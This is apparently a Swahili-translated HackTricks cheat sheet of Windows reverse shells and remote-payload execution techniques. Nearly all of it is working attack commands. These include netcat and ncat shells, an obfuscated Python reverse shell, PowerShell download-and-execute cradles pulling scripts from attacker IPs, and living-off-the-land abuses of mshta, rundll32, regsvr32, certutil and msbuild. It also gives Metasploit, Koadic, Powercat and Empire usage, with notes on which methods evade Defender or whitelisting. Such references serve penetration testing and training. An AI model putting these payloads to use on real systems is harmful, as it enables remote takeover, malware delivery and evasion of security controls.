# Shells - Windows {{#include ../../banners/hacktricks-training.md}} ## Lolbas The page [lolbas-project.github.io](https://lolbas-project.github.io/) ni ya Windows kama [https://gtfobins.github.io/](https://gtfobins.github.io/) ni ya linux.\ Kwa wazi, **hakuna faili za SUID au ruhusa za sudo katika Windows**, lakini ni muhimu kujua **jinsi** baadhi ya **binaries** zinaweza kutumika (ku)fanya aina fulani za vitendo visivyotarajiwa kama **kutekeleza msimbo wa bahati nasibu.** ## NC ```bash nc.exe -e cmd.exe ``` ## NCAT mhasiri ``` ncat.exe -e "cmd.exe /c (cmd.exe 2>&1)" #Encryption to bypass firewall ncat.exe --ssl -e "cmd.exe /c (cmd.exe 2>&1)" ``` mshambuliaji ``` ncat -l #Encryption to bypass firewall ncat -l --ssl ``` ## SBD **[sbd](https://www.kali.org/tools/sbd/) ni mbadala wa Netcat unaoweza kubebeka na salama**. Inafanya kazi kwenye mifumo ya Unix kama vile na Win32. Ikiwa na vipengele kama vile usimbuaji wenye nguvu, utekelezaji wa programu, bandari za chanzo zinazoweza kubadilishwa, na kuunganishwa tena mara kwa mara, sbd inatoa suluhisho la kubadilika kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka kwa usambazaji wa Kali Linux linaweza kutumika kama mbadala wa kuaminika wa Netcat. ```bash # Victims machine sbd -l -p 4444 -e bash -v -n listening on port 4444 # Atackers sbd 10.10.10.10 4444 id uid=0(root) gid=0(root) groups=0(root) ``` ## Python ```bash #Windows C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" ``` ## Perl ```bash perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` ## Ruby ```bash #Windows ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` ## Lua ```bash lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` ## OpenSSH Attacker (Kali) ```bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response ``` Mtu waathirika ```bash #Linux openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : #Windows openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : ``` ## Powershell ```bash powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile ``` Mchakato unaofanya wito wa mtandao: **powershell.exe**\ Payload imeandikwa kwenye diski: **HAPANA** (_angalau sio mahali popote nilipoweza kupata kwa kutumia procmon !_ ) ```bash powershell -exec bypass -f \\webdavserver\folder\payload.ps1 ``` Mchakato unaofanya wito wa mtandao: **svchost.exe**\ Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache** **Mstari mmoja:** ```bash $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` **Pata maelezo zaidi kuhusu Shells tofauti za Powershell mwishoni mwa hati hii** ## Mshta - [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) ``` ```bash mshta http://webserver/payload.hta ``` ```bash mshta \\webdavserver\folder\payload.hta ``` #### **Mfano wa hta-psh reverse shell (tumia hta kupakua na kutekeleza PS backdoor)** ```xml ``` **Unaweza kupakua na kutekeleza kwa urahisi sana zombie ya Koadic ukitumia stager hta** #### mfano wa hta [**Kutoka hapa**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) ```xml ``` #### **mshta - sct** [**Kutoka hapa**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) ```xml ``` #### **Mshta - Metasploit** ```bash use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit ``` ```bash Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit ``` **Imegunduliwa na defender** ## **Rundll32** [**Mfano wa dll hello world**](https://github.com/carterjones/hello-world-dll) - [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash rundll32 \\webdavserver\folder\payload.dll,entrypoint ``` ```bash rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); ``` **Imegunduliwa na defender** **Rundll32 - sct** [**Kutoka hapa**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) ```xml ``` #### **Rundll32 - Metasploit** ```bash use windows/smb/smb_delivery run #You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 ``` **Rundll32 - Koadic** ```bash use stager/js/rundll32_js set SRVHOST 192.168.1.107 set ENDPOINT sales run #Koadic will tell you what you need to execute inside the victim, it will be something like: rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); ``` ## Regsvr32 - [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll ``` ``` regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll ``` **Imepatikana na mlinzi** #### Regsvr32 -sct [**Kutoka hapa**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) ```html ``` #### **Regsvr32 - Metasploit** ```bash use multi/script/web_delivery set target 3 set payload windows/meterpreter/reverse/tcp set lhost 10.2.0.5 run #You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll ``` **Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager regsvr** ## Certutil - [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) Pakua B64dll, ikode na uitekeleze. ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll ``` Pakua B64exe, ibadilishe na uifanye kazi. ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe ``` **Imegunduliwa na mlinzi** ## **Cscript/Wscript** ```bash powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" ``` **Cscript - Metasploit** ```bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs ``` **Imegunduliwa na mlinzi** ## PS-Bat ```bash \\webdavserver\folder\batchfile.bat ``` Mchakato unaofanya wito wa mtandao: **svchost.exe**\ Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache** ```bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat impacket-smbserver -smb2support kali `pwd` ``` ```bash \\10.8.0.3\kali\shell.bat ``` **Imegunduliwa na mlinzi** ## **MSIExec** Mshambuliaji ``` msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi python -m SimpleHTTPServer 80 ``` Victim: ``` victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi ``` **Imepatikana** ## **Wmic** - [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash wmic os get /format:"https://webserver/payload.xsl" ``` Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): ```xml ``` **Haitambuliwi** **Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager wmic** ## Msbuild - [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ``` cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" ``` Unaweza kutumia mbinu hii kupita Application Whitelisting na vizuizi vya Powershell.exe. Kwa kuwa utapewa shell ya PS.\ Pakua hii na uitekeleze: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj ``` **Haitagunduliwa** ## **CSC** Kusanya msimbo wa C# kwenye mashine ya mwathirika. ``` C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs ``` Unaweza kupakua shell ya msingi ya C# kutoka hapa: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) **Haitambuliwi** ## **Regasm/Regsvc** - [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll ``` **Sijajaribu** [**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) ## Odbcconf - [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} ``` **Sijajaribu** [**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) ## Powershell Shells ### PS-Nishang [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) Katika folda ya **Shells**, kuna shell nyingi tofauti. Ili kupakua na kutekeleza Invoke-_PowerShellTcp.ps1_, fanya nakala ya script na ongeza mwishoni mwa faili: ``` Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 ``` Anza kuhudumia skripti kwenye seva ya wavuti na uitekeleze upande wa mwathirika: ``` powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" ``` Defender haitambui kama msimbo mbaya (bado, 3/04/2019). **TODO: Angalia nishang shells nyingine** ### **PS-Powercat** [**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) Pakua, anzisha seva ya wavuti, anzisha msikilizaji, na uite upande wa mwathirika: ``` powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" ``` Defender haitambui kama msimbo mbaya (bado, 3/04/2019). **Chaguzi zingine zinazotolewa na powercat:** Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files... ``` Serve a cmd Shell: powercat -l -p 443 -e cmd Send a cmd Shell: powercat -c 10.1.1.1 -p 443 -e cmd Send a powershell: powercat -c 10.1.1.1 -p 443 -ep Send a powershell UDP: powercat -c 10.1.1.1 -p 443 -ep -u TCP Listener to TCP Client Relay: powercat -l -p 8000 -r tcp:10.1.1.16:443 Generate a reverse tcp payload which connects back to 10.1.1.15 port 443: powercat -c 10.1.1.15 -p 443 -e cmd -g Start A Persistent Server That Serves a File: powercat -l -p 443 -i C:\inputfile -rep ``` ### Empire [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) Unda launcher ya powershell, ihifadhi kwenye faili na uipakue na kuitekeleze. ``` powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" ``` **Imepatikana kama msimbo mbaya** ### MSF-Unicorn [https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) Unda toleo la powershell la backdoor ya metasploit ukitumia unicorn ``` python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 ``` Anza msfconsole na rasilimali iliyoundwa: ``` msfconsole -r unicorn.rc ``` Anza seva ya wavuti inayotoa faili _powershell_attack.txt_ na utekeleze katika mwathiriwa: ``` powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" ``` **Imedhamini kama msimbo mbaya** ## Zaidi [PS>Attack](https://github.com/jaredhaight/PSAttack) PS console yenye baadhi ya moduli za PS za kushambulia zilizopakiwa (cyphered)\ [https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console yenye baadhi ya moduli za PS za kushambulia na ugunduzi wa proxy (IEX) ## Marejeleo - [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) - [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x) - [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT) - [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/) - [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/) - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) - [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) {{#include ../../banners/hacktricks-training.md}}